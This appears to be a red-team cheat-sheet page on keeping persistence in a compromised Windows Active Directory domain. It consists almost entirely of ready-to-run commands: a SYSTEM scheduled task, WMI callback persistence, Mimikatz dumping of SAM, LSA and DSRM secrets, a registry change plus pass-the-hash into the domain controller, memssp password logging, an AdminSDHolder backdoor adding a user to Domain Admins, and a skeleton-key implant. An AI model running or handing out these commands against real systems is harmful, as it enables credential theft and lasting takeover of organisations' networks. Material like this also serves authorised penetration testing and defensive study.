Comment on page
Persistence
schtasks /create /tn "xct" /ru "SYSTEM" /tr "c:\temp\xct.exe" /sc DAILY
schtasks /run /tn "xct"
schtasks /query /tn "xct" /FO list /v
schtasks /delete /tn "xct" /f
Run "PersistWMI", this will execute along another program. E.g. the victim opens chrome our persistence calls back.
Directory Services Restore Mode Password only needed on promotion to DC, rarely used and changed, so we either obtain or change it:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <dc>
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName <dc>
# Compare hashes, first one is DSRM
# We can pth into the dc with the ntlm hash of the dsrm, but first we have to change his logon behaviour
Enter-PSSession -Computername <dc>
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD
# Pth into it
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<domain> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
Security Support Provider, with mimikatz, mimilib.dll, which logs all passwords in cleartext:
Invoke-Mimikatz -Command '"misc::memssp"'
Adds user to domain admin group (PowerView):
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose
$session = New-PSSession -ComputerName <dc>
Invoke-Command -FilePath .\Invoke-SDPropagator -Session $session
Enter-PSSession -Session $session
Add-DomainGroupMember -Identity 'Domain Admins' -Members <user> -Verbose
# This lets you log into every account with the password "mimikatz", you should compile it yourself and change that probably. You might also need to remove process protection before running it
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <name>
Last modified 9mo ago